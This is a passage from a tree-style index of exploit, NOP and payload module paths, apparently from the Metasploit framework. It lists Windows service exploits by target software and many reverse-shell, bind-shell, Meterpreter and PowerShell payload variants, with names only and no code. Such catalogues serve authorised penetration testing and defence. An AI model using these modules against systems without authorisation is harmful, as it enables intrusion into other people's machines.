exploit/windows/smb/smb_rras_erraticgopher | exploit/windows/smb/smb_shadow | exploit/windows/smb/timbuktu_plughntcommand_bof | exploit/windows/smb/webexec | . | smtp (7) . | exploit/windows/smtp/mailcarrier_smtp_ehlo | exploit/windows/smtp/mercury_cram_md5 | exploit/windows/smtp/ms03_046_exchange2000_xexch50 | exploit/windows/smtp/njstar_smtp_bof | exploit/windows/smtp/sysgauge_client_bof | exploit/windows/smtp/wmailserver | exploit/windows/smtp/ypops_overflow1 | . | ssh (6) . | exploit/windows/ssh/freeftpd_key_exchange | exploit/windows/ssh/freesshd_authbypass | exploit/windows/ssh/freesshd_key_exchange | exploit/windows/ssh/putty_msg_debug | exploit/windows/ssh/securecrt_ssh1 | exploit/windows/ssh/sysax_ssh_username | . | ssl (1) . | exploit/windows/ssl/ms04_011_pct | . | telnet (2) . 
| exploit/windows/telnet/gamsoft_telsrv_username | exploit/windows/telnet/goodtech_telnet | . | tftp (11) . | exploit/windows/tftp/attftp_long_filename | exploit/windows/tftp/distinct_tftp_traversal | exploit/windows/tftp/dlink_long_filename | exploit/windows/tftp/futuresoft_transfermode | exploit/windows/tftp/netdecision_tftp_traversal | exploit/windows/tftp/opentftp_error_code | exploit/windows/tftp/quick_tftp_pro_mode | exploit/windows/tftp/tftpd32_long_filename | exploit/windows/tftp/tftpdwin_long_filename | exploit/windows/tftp/tftpserver_wrq_bof | exploit/windows/tftp/threectftpsvc_long_mode | . | unicenter (1) . | exploit/windows/unicenter/cam_log_security | . | vnc (4) . | exploit/windows/vnc/realvnc_client | exploit/windows/vnc/ultravnc_client | exploit/windows/vnc/ultravnc_viewer_bof | exploit/windows/vnc/winvnc_http_get | . | vpn (1) . | exploit/windows/vpn/safenet_ike_11 | . | winrm (1) . | exploit/windows/winrm/winrm_script_exec | . | wins (1) . | exploit/windows/wins/ms04_045_wins | . | . | . | nop (11) . | aarch64 (1) . | nop/aarch64/simple | . | armle (1) . | nop/armle/simple | . | cmd (1) . | nop/cmd/generic | . | mipsbe (1) . | nop/mipsbe/better | . | php (1) . | nop/php/generic | . | ppc (1) . | nop/ppc/simple | . | sparc (1) . | nop/sparc/random | . | tty (1) . | nop/tty/generic | . | x64 (1) . | nop/x64/simple | . | x86 (2) . | nop/x86/opty2 | nop/x86/single_byte | . | . | payload (1468) . | aix (4) . | ppc (4) . | payload/aix/ppc/shell_bind_tcp | payload/aix/ppc/shell_find_port | payload/aix/ppc/shell_interact | payload/aix/ppc/shell_reverse_tcp | . | . | android (9) . | meterpreter (3) . | payload/android/meterpreter/reverse_http | payload/android/meterpreter/reverse_https | payload/android/meterpreter/reverse_tcp | . | shell (3) . | payload/android/shell/reverse_http | payload/android/shell/reverse_https | payload/android/shell/reverse_tcp | . 
| payload/android/meterpreter_reverse_http | payload/android/meterpreter_reverse_https | payload/android/meterpreter_reverse_tcp | . | apple_ios (7) . | aarch64 (4) . | payload/apple_ios/aarch64/meterpreter_reverse_http | payload/apple_ios/aarch64/meterpreter_reverse_https | payload/apple_ios/aarch64/meterpreter_reverse_tcp | payload/apple_ios/aarch64/shell_reverse_tcp | . | armle (3) . | payload/apple_ios/armle/meterpreter_reverse_http | payload/apple_ios/armle/meterpreter_reverse_https | payload/apple_ios/armle/meterpreter_reverse_tcp | . | . | bsd (24) . | sparc (2) . | payload/bsd/sparc/shell_bind_tcp | payload/bsd/sparc/shell_reverse_tcp | . | vax (1) . | payload/bsd/vax/shell_reverse_tcp | . | x64 (7) . | payload/bsd/x64/exec | payload/bsd/x64/shell_bind_ipv6_tcp | payload/bsd/x64/shell_bind_tcp | payload/bsd/x64/shell_bind_tcp_small | payload/bsd/x64/shell_reverse_ipv6_tcp | payload/bsd/x64/shell_reverse_tcp | payload/bsd/x64/shell_reverse_tcp_small | . | x86 (14) . | shell (5) . | payload/bsd/x86/shell/bind_ipv6_tcp | payload/bsd/x86/shell/bind_tcp | payload/bsd/x86/shell/find_tag | payload/bsd/x86/shell/reverse_ipv6_tcp | payload/bsd/x86/shell/reverse_tcp | . | payload/bsd/x86/exec | payload/bsd/x86/metsvc_bind_tcp | payload/bsd/x86/metsvc_reverse_tcp | payload/bsd/x86/shell_bind_tcp | payload/bsd/x86/shell_bind_tcp_ipv6 | payload/bsd/x86/shell_find_port | payload/bsd/x86/shell_find_tag | payload/bsd/x86/shell_reverse_tcp | payload/bsd/x86/shell_reverse_tcp_ipv6 | . | . | bsdi (5) . | x86 (5) . | shell (2) . | payload/bsdi/x86/shell/bind_tcp | payload/bsdi/x86/shell/reverse_tcp | . | payload/bsdi/x86/shell_bind_tcp | payload/bsdi/x86/shell_find_port | payload/bsdi/x86/shell_reverse_tcp | . | . | cmd (884) . | linux (177) . | http (59) . | mips64 (3) . | payload/cmd/linux/http/mips64/meterpreter_reverse_http | payload/cmd/linux/http/mips64/meterpreter_reverse_https | payload/cmd/linux/http/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . 
| payload/cmd/linux/http/x64/meterpreter/bind_tcp | payload/cmd/linux/http/x64/meterpreter/reverse_sctp | payload/cmd/linux/http/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/http/x64/shell/bind_tcp | payload/cmd/linux/http/x64/shell/reverse_sctp | payload/cmd/linux/http/x64/shell/reverse_tcp | . | payload/cmd/linux/http/x64/exec | payload/cmd/linux/http/x64/meterpreter_reverse_http | payload/cmd/linux/http/x64/meterpreter_reverse_https | payload/cmd/linux/http/x64/meterpreter_reverse_tcp | payload/cmd/linux/http/x64/pingback_bind_tcp | payload/cmd/linux/http/x64/pingback_reverse_tcp | payload/cmd/linux/http/x64/shell_bind_ipv6_tcp | payload/cmd/linux/http/x64/shell_bind_tcp | payload/cmd/linux/http/x64/shell_bind_tcp_random_port | payload/cmd/linux/http/x64/shell_find_port | payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/http/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . | payload/cmd/linux/http/x86/generic/debug_trap | payload/cmd/linux/http/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/http/x86/meterpreter/bind_tcp | payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/http/x86/meterpreter/find_tag | payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_tcp | payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . 
| payload/cmd/linux/http/x86/shell/bind_ipv6_tcp | payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/http/x86/shell/bind_nonx_tcp | payload/cmd/linux/http/x86/shell/bind_tcp | payload/cmd/linux/http/x86/shell/bind_tcp_uuid | payload/cmd/linux/http/x86/shell/find_tag | payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp | payload/cmd/linux/http/x86/shell/reverse_nonx_tcp | payload/cmd/linux/http/x86/shell/reverse_tcp | payload/cmd/linux/http/x86/shell/reverse_tcp_uuid | . | payload/cmd/linux/http/x86/adduser | payload/cmd/linux/http/x86/chmod | payload/cmd/linux/http/x86/exec | payload/cmd/linux/http/x86/meterpreter_reverse_http | payload/cmd/linux/http/x86/meterpreter_reverse_https | payload/cmd/linux/http/x86/meterpreter_reverse_tcp | payload/cmd/linux/http/x86/metsvc_bind_tcp | payload/cmd/linux/http/x86/metsvc_reverse_tcp | payload/cmd/linux/http/x86/read_file | payload/cmd/linux/http/x86/shell_bind_ipv6_tcp | payload/cmd/linux/http/x86/shell_bind_tcp | payload/cmd/linux/http/x86/shell_bind_tcp_random_port | payload/cmd/linux/http/x86/shell_find_port | payload/cmd/linux/http/x86/shell_find_tag | payload/cmd/linux/http/x86/shell_reverse_tcp | payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6 | . | . | https (59) . | mips64 (3) . | payload/cmd/linux/https/mips64/meterpreter_reverse_http | payload/cmd/linux/https/mips64/meterpreter_reverse_https | payload/cmd/linux/https/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/cmd/linux/https/x64/meterpreter/bind_tcp | payload/cmd/linux/https/x64/meterpreter/reverse_sctp | payload/cmd/linux/https/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/https/x64/shell/bind_tcp | payload/cmd/linux/https/x64/shell/reverse_sctp | payload/cmd/linux/https/x64/shell/reverse_tcp | . 
| payload/cmd/linux/https/x64/exec | payload/cmd/linux/https/x64/meterpreter_reverse_http | payload/cmd/linux/https/x64/meterpreter_reverse_https | payload/cmd/linux/https/x64/meterpreter_reverse_tcp | payload/cmd/linux/https/x64/pingback_bind_tcp | payload/cmd/linux/https/x64/pingback_reverse_tcp | payload/cmd/linux/https/x64/shell_bind_ipv6_tcp | payload/cmd/linux/https/x64/shell_bind_tcp | payload/cmd/linux/https/x64/shell_bind_tcp_random_port | payload/cmd/linux/https/x64/shell_find_port | payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/https/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . | payload/cmd/linux/https/x86/generic/debug_trap | payload/cmd/linux/https/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/https/x86/meterpreter/bind_tcp | payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/https/x86/meterpreter/find_tag | payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_tcp | payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/cmd/linux/https/x86/shell/bind_ipv6_tcp | payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/https/x86/shell/bind_nonx_tcp | payload/cmd/linux/https/x86/shell/bind_tcp | payload/cmd/linux/https/x86/shell/bind_tcp_uuid | payload/cmd/linux/https/x86/shell/find_tag | payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp | payload/cmd/linux/https/x86/shell/reverse_nonx_tcp | payload/cmd/linux/https/x86/shell/reverse_tcp | payload/cmd/linux/https/x86/shell/reverse_tcp_uuid | . 
| payload/cmd/linux/https/x86/adduser | payload/cmd/linux/https/x86/chmod | payload/cmd/linux/https/x86/exec | payload/cmd/linux/https/x86/meterpreter_reverse_http | payload/cmd/linux/https/x86/meterpreter_reverse_https | payload/cmd/linux/https/x86/meterpreter_reverse_tcp | payload/cmd/linux/https/x86/metsvc_bind_tcp | payload/cmd/linux/https/x86/metsvc_reverse_tcp | payload/cmd/linux/https/x86/read_file | payload/cmd/linux/https/x86/shell_bind_ipv6_tcp | payload/cmd/linux/https/x86/shell_bind_tcp | payload/cmd/linux/https/x86/shell_bind_tcp_random_port | payload/cmd/linux/https/x86/shell_find_port | payload/cmd/linux/https/x86/shell_find_tag | payload/cmd/linux/https/x86/shell_reverse_tcp | payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6 | . | . | tftp (59) . | mips64 (3) . | payload/cmd/linux/tftp/mips64/meterpreter_reverse_http | payload/cmd/linux/tftp/mips64/meterpreter_reverse_https | payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/cmd/linux/tftp/x64/meterpreter/bind_tcp | payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp | payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/cmd/linux/tftp/x64/shell/bind_tcp | payload/cmd/linux/tftp/x64/shell/reverse_sctp | payload/cmd/linux/tftp/x64/shell/reverse_tcp | . | payload/cmd/linux/tftp/x64/exec | payload/cmd/linux/tftp/x64/meterpreter_reverse_http | payload/cmd/linux/tftp/x64/meterpreter_reverse_https | payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp | payload/cmd/linux/tftp/x64/pingback_bind_tcp | payload/cmd/linux/tftp/x64/pingback_reverse_tcp | payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp | payload/cmd/linux/tftp/x64/shell_bind_tcp | payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port | payload/cmd/linux/tftp/x64/shell_find_port | payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp | payload/cmd/linux/tftp/x64/shell_reverse_tcp | . | x86 (38) . | generic (2) . 
| payload/cmd/linux/tftp/x86/generic/debug_trap | payload/cmd/linux/tftp/x86/generic/tight_loop | . | meterpreter (10) . | payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_tcp | payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid | payload/cmd/linux/tftp/x86/meterpreter/find_tag | payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp | payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp | payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid | payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp | payload/cmd/linux/tftp/x86/shell/bind_tcp | payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid | payload/cmd/linux/tftp/x86/shell/find_tag | payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp | payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp | payload/cmd/linux/tftp/x86/shell/reverse_tcp | payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid | . | payload/cmd/linux/tftp/x86/adduser | payload/cmd/linux/tftp/x86/chmod | payload/cmd/linux/tftp/x86/exec | payload/cmd/linux/tftp/x86/meterpreter_reverse_http | payload/cmd/linux/tftp/x86/meterpreter_reverse_https | payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp | payload/cmd/linux/tftp/x86/metsvc_bind_tcp | payload/cmd/linux/tftp/x86/metsvc_reverse_tcp | payload/cmd/linux/tftp/x86/read_file | payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp | payload/cmd/linux/tftp/x86/shell_bind_tcp | payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port | payload/cmd/linux/tftp/x86/shell_find_port | payload/cmd/linux/tftp/x86/shell_find_tag | payload/cmd/linux/tftp/x86/shell_reverse_tcp | payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6 | . | . | . | mainframe (4) . 
| payload/cmd/mainframe/apf_privesc_jcl | payload/cmd/mainframe/bind_shell_jcl | payload/cmd/mainframe/generic_jcl | payload/cmd/mainframe/reverse_shell_jcl | . | unix (71) . | python (18) . | meterpreter (7) . | payload/cmd/unix/python/meterpreter/bind_tcp | payload/cmd/unix/python/meterpreter/bind_tcp_uuid | payload/cmd/unix/python/meterpreter/reverse_http | payload/cmd/unix/python/meterpreter/reverse_https | payload/cmd/unix/python/meterpreter/reverse_tcp | payload/cmd/unix/python/meterpreter/reverse_tcp_ssl | payload/cmd/unix/python/meterpreter/reverse_tcp_uuid | . | payload/cmd/unix/python/meterpreter_bind_tcp | payload/cmd/unix/python/meterpreter_reverse_http | payload/cmd/unix/python/meterpreter_reverse_https | payload/cmd/unix/python/meterpreter_reverse_tcp | payload/cmd/unix/python/pingback_bind_tcp | payload/cmd/unix/python/pingback_reverse_tcp | payload/cmd/unix/python/shell_bind_tcp | payload/cmd/unix/python/shell_reverse_sctp | payload/cmd/unix/python/shell_reverse_tcp | payload/cmd/unix/python/shell_reverse_tcp_ssl | payload/cmd/unix/python/shell_reverse_udp | . 
| payload/cmd/unix/adduser | payload/cmd/unix/bind_awk | payload/cmd/unix/bind_aws_instance_connect | payload/cmd/unix/bind_busybox_telnetd | payload/cmd/unix/bind_inetd | payload/cmd/unix/bind_jjs | payload/cmd/unix/bind_lua | payload/cmd/unix/bind_netcat | payload/cmd/unix/bind_netcat_gaping | payload/cmd/unix/bind_netcat_gaping_ipv6 | payload/cmd/unix/bind_nodejs | payload/cmd/unix/bind_perl | payload/cmd/unix/bind_perl_ipv6 | payload/cmd/unix/bind_r | payload/cmd/unix/bind_ruby | payload/cmd/unix/bind_ruby_ipv6 | payload/cmd/unix/bind_socat_sctp | payload/cmd/unix/bind_socat_udp | payload/cmd/unix/bind_stub | payload/cmd/unix/bind_zsh | payload/cmd/unix/generic | payload/cmd/unix/interact | payload/cmd/unix/pingback_bind | payload/cmd/unix/pingback_reverse | payload/cmd/unix/reverse | payload/cmd/unix/reverse_awk | payload/cmd/unix/reverse_bash | payload/cmd/unix/reverse_bash_telnet_ssl | payload/cmd/unix/reverse_bash_udp | payload/cmd/unix/reverse_jjs | payload/cmd/unix/reverse_ksh | payload/cmd/unix/reverse_lua | payload/cmd/unix/reverse_ncat_ssl | payload/cmd/unix/reverse_netcat | payload/cmd/unix/reverse_netcat_gaping | payload/cmd/unix/reverse_nodejs | payload/cmd/unix/reverse_openssl | payload/cmd/unix/reverse_perl | payload/cmd/unix/reverse_perl_ssl | payload/cmd/unix/reverse_php_ssl | payload/cmd/unix/reverse_python | payload/cmd/unix/reverse_python_ssl | payload/cmd/unix/reverse_r | payload/cmd/unix/reverse_ruby | payload/cmd/unix/reverse_ruby_ssl | payload/cmd/unix/reverse_socat_sctp | payload/cmd/unix/reverse_socat_tcp | payload/cmd/unix/reverse_socat_udp | payload/cmd/unix/reverse_ssh | payload/cmd/unix/reverse_ssl_double_telnet | payload/cmd/unix/reverse_stub | payload/cmd/unix/reverse_tclsh | payload/cmd/unix/reverse_zsh | . | windows (632) . | http (77) . | x64 (77) . | custom (14) . 
| payload/cmd/windows/http/x64/custom/bind_ipv6_tcp | payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/custom/bind_named_pipe | payload/cmd/windows/http/x64/custom/bind_tcp | payload/cmd/windows/http/x64/custom/bind_tcp_rc4 | payload/cmd/windows/http/x64/custom/bind_tcp_uuid | payload/cmd/windows/http/x64/custom/reverse_http | payload/cmd/windows/http/x64/custom/reverse_https | payload/cmd/windows/http/x64/custom/reverse_named_pipe | payload/cmd/windows/http/x64/custom/reverse_tcp | payload/cmd/windows/http/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/http/x64/custom/reverse_tcp_uuid | payload/cmd/windows/http/x64/custom/reverse_winhttp | payload/cmd/windows/http/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/bind_named_pipe | payload/cmd/windows/http/x64/meterpreter/bind_tcp | payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/reverse_http | payload/cmd/windows/http/x64/meterpreter/reverse_https | payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/http/x64/meterpreter/reverse_tcp | payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/http/x64/meterpreter/reverse_winhttp | payload/cmd/windows/http/x64/meterpreter/reverse_winhttps | . | peinject (10) . 
| payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/peinject/bind_named_pipe | payload/cmd/windows/http/x64/peinject/bind_tcp | payload/cmd/windows/http/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/http/x64/peinject/bind_tcp_uuid | payload/cmd/windows/http/x64/peinject/reverse_named_pipe | payload/cmd/windows/http/x64/peinject/reverse_tcp | payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/http/x64/shell/bind_ipv6_tcp | payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/shell/bind_named_pipe | payload/cmd/windows/http/x64/shell/bind_tcp | payload/cmd/windows/http/x64/shell/bind_tcp_rc4 | payload/cmd/windows/http/x64/shell/bind_tcp_uuid | payload/cmd/windows/http/x64/shell/reverse_tcp | payload/cmd/windows/http/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/http/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/http/x64/vncinject/bind_named_pipe | payload/cmd/windows/http/x64/vncinject/bind_tcp | payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/http/x64/vncinject/reverse_http | payload/cmd/windows/http/x64/vncinject/reverse_https | payload/cmd/windows/http/x64/vncinject/reverse_tcp | payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/http/x64/vncinject/reverse_winhttp | payload/cmd/windows/http/x64/vncinject/reverse_winhttps | . 
| payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/http/x64/exec | payload/cmd/windows/http/x64/loadlibrary | payload/cmd/windows/http/x64/messagebox | payload/cmd/windows/http/x64/meterpreter_bind_named_pipe | payload/cmd/windows/http/x64/meterpreter_bind_tcp | payload/cmd/windows/http/x64/meterpreter_reverse_http | payload/cmd/windows/http/x64/meterpreter_reverse_https | payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/http/x64/meterpreter_reverse_tcp | payload/cmd/windows/http/x64/pingback_reverse_tcp | payload/cmd/windows/http/x64/powershell_bind_tcp | payload/cmd/windows/http/x64/powershell_reverse_tcp | payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/http/x64/shell_bind_tcp | payload/cmd/windows/http/x64/shell_reverse_tcp | . | . | https (77) . | x64 (77) . | custom (14) . | payload/cmd/windows/https/x64/custom/bind_ipv6_tcp | payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/custom/bind_named_pipe | payload/cmd/windows/https/x64/custom/bind_tcp | payload/cmd/windows/https/x64/custom/bind_tcp_rc4 | payload/cmd/windows/https/x64/custom/bind_tcp_uuid | payload/cmd/windows/https/x64/custom/reverse_http | payload/cmd/windows/https/x64/custom/reverse_https | payload/cmd/windows/https/x64/custom/reverse_named_pipe | payload/cmd/windows/https/x64/custom/reverse_tcp | payload/cmd/windows/https/x64/custom/reverse_tcp_rc4 | payload/cmd/windows/https/x64/custom/reverse_tcp_uuid | payload/cmd/windows/https/x64/custom/reverse_winhttp | payload/cmd/windows/https/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . 
| payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp | payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/bind_named_pipe | payload/cmd/windows/https/x64/meterpreter/bind_tcp | payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4 | payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/reverse_http | payload/cmd/windows/https/x64/meterpreter/reverse_https | payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe | payload/cmd/windows/https/x64/meterpreter/reverse_tcp | payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4 | payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid | payload/cmd/windows/https/x64/meterpreter/reverse_winhttp | payload/cmd/windows/https/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp | payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/peinject/bind_named_pipe | payload/cmd/windows/https/x64/peinject/bind_tcp | payload/cmd/windows/https/x64/peinject/bind_tcp_rc4 | payload/cmd/windows/https/x64/peinject/bind_tcp_uuid | payload/cmd/windows/https/x64/peinject/reverse_named_pipe | payload/cmd/windows/https/x64/peinject/reverse_tcp | payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4 | payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/cmd/windows/https/x64/shell/bind_ipv6_tcp | payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/shell/bind_named_pipe | payload/cmd/windows/https/x64/shell/bind_tcp | payload/cmd/windows/https/x64/shell/bind_tcp_rc4 | payload/cmd/windows/https/x64/shell/bind_tcp_uuid | payload/cmd/windows/https/x64/shell/reverse_tcp | payload/cmd/windows/https/x64/shell/reverse_tcp_rc4 | payload/cmd/windows/https/x64/shell/reverse_tcp_uuid | . | vncinject (13) . 
| payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp | payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid | payload/cmd/windows/https/x64/vncinject/bind_named_pipe | payload/cmd/windows/https/x64/vncinject/bind_tcp | payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4 | payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid | payload/cmd/windows/https/x64/vncinject/reverse_http | payload/cmd/windows/https/x64/vncinject/reverse_https | payload/cmd/windows/https/x64/vncinject/reverse_tcp | payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4 | payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid | payload/cmd/windows/https/x64/vncinject/reverse_winhttp | payload/cmd/windows/https/x64/vncinject/reverse_winhttps | . | payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp | payload/cmd/windows/https/x64/exec | payload/cmd/windows/https/x64/loadlibrary | payload/cmd/windows/https/x64/messagebox | payload/cmd/windows/https/x64/meterpreter_bind_named_pipe | payload/cmd/windows/https/x64/meterpreter_bind_tcp | payload/cmd/windows/https/x64/meterpreter_reverse_http | payload/cmd/windows/https/x64/meterpreter_reverse_https | payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp | payload/cmd/windows/https/x64/meterpreter_reverse_tcp | payload/cmd/windows/https/x64/pingback_reverse_tcp | payload/cmd/windows/https/x64/powershell_bind_tcp | payload/cmd/windows/https/x64/powershell_reverse_tcp | payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl | payload/cmd/windows/https/x64/shell_bind_tcp | payload/cmd/windows/https/x64/shell_reverse_tcp | . | . | powershell (290) . | custom (28) . 
| payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp | payload/cmd/windows/powershell/custom/bind_hidden_tcp | payload/cmd/windows/powershell/custom/bind_ipv6_tcp | payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid | payload/cmd/windows/powershell/custom/bind_named_pipe | payload/cmd/windows/powershell/custom/bind_nonx_tcp | payload/cmd/windows/powershell/custom/bind_tcp | payload/cmd/windows/powershell/custom/bind_tcp_rc4 | payload/cmd/windows/powershell/custom/bind_tcp_uuid | payload/cmd/windows/powershell/custom/find_tag | payload/cmd/windows/powershell/custom/reverse_hop_http | payload/cmd/windows/powershell/custom/reverse_http | payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore | payload/cmd/windows/powershell/custom/reverse_https | payload/cmd/windows/powershell/custom/reverse_https_proxy | payload/cmd/windows/powershell/custom/reverse_ipv6_tcp | payload/cmd/windows/powershell/custom/reverse_named_pipe | payload/cmd/windows/powershell/custom/reverse_nonx_tcp | payload/cmd/windows/powershell/custom/reverse_ord_tcp | payload/cmd/windows/powershell/custom/reverse_tcp | payload/cmd/windows/powershell/custom/reverse_tcp_allports | payload/cmd/windows/powershell/custom/reverse_tcp_dns | payload/cmd/windows/powershell/custom/reverse_tcp_rc4 | payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns | payload/cmd/windows/powershell/custom/reverse_tcp_uuid | payload/cmd/windows/powershell/custom/reverse_udp | payload/cmd/windows/powershell/custom/reverse_winhttp | payload/cmd/windows/powershell/custom/reverse_winhttps | . | dllinject (23) . 
